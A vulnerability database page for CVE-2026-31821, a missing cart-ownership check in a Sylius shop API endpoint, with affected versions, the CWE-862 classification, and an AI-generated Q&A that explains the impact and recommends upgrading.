CVE-2026-31821
Received Received - Intake
Unauthorized Cart Modification in Sylius via Insecure API Endpoint

Publication date: 2026-03-10

Last updated on: 2026-03-11

Assigner: GitHub, Inc.

Description
Sylius is an Open Source eCommerce Framework on Symfony. The POST /api/v2/shop/orders/{tokenValue}/items endpoint does not verify cart ownership. An unauthenticated attacker can add items to other registered customers' carts by knowing the cart tokenValue. An attacker who obtains a cart tokenValue can add arbitrary items to another customer's cart. The endpoint returns the full cart representation in the response (HTTP 201). The issue is fixed in versions: 2.0.16, 2.1.12, 2.2.3 and above.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-10
Last Modified
2026-03-11
Generated
2026-05-06
AI Q&A
2026-03-11
EPSS Evaluated
2026-05-05
NVD
CVE-2026-31821
EUVD
EUVD-2026-10914
Affected Vendors & Products
Showing 3 associated CPEs
Vendor Product Version / Range
sylius sylius From 2.0.0 (inc) to 2.0.16 (exc)
sylius sylius From 2.1.0 (inc) to 2.1.12 (exc)
sylius sylius From 2.2.0 (inc) to 2.2.3 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-862 The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in the Sylius Open Source eCommerce Framework on Symfony, specifically in the POST /api/v2/shop/orders/{tokenValue}/items endpoint.

The endpoint does not verify cart ownership, which means an unauthenticated attacker who knows a cart's tokenValue can add items to that cart.

In other words, if an attacker obtains the tokenValue of another customer's cart, they can add arbitrary items to that customer's cart without authentication.

Additionally, the endpoint returns the full cart representation in the response, which could expose further information.

This issue has been fixed in Sylius versions 2.0.16, 2.1.12, 2.2.3 and above.


How can this vulnerability impact me? :

This vulnerability can impact you by allowing an attacker to manipulate your shopping cart without your consent.

An attacker could add unwanted or arbitrary items to your cart, potentially causing confusion, incorrect orders, or financial implications if the order is processed.

Since the attacker does not need to be authenticated, this could affect any customer whose cart tokenValue is known or guessed.

Furthermore, the exposure of the full cart representation in the response could leak sensitive information about your cart contents.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

I don't know


What immediate steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, upgrade Sylius to version 2.0.16, 2.1.12, 2.2.3 or above, where the issue has been fixed.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart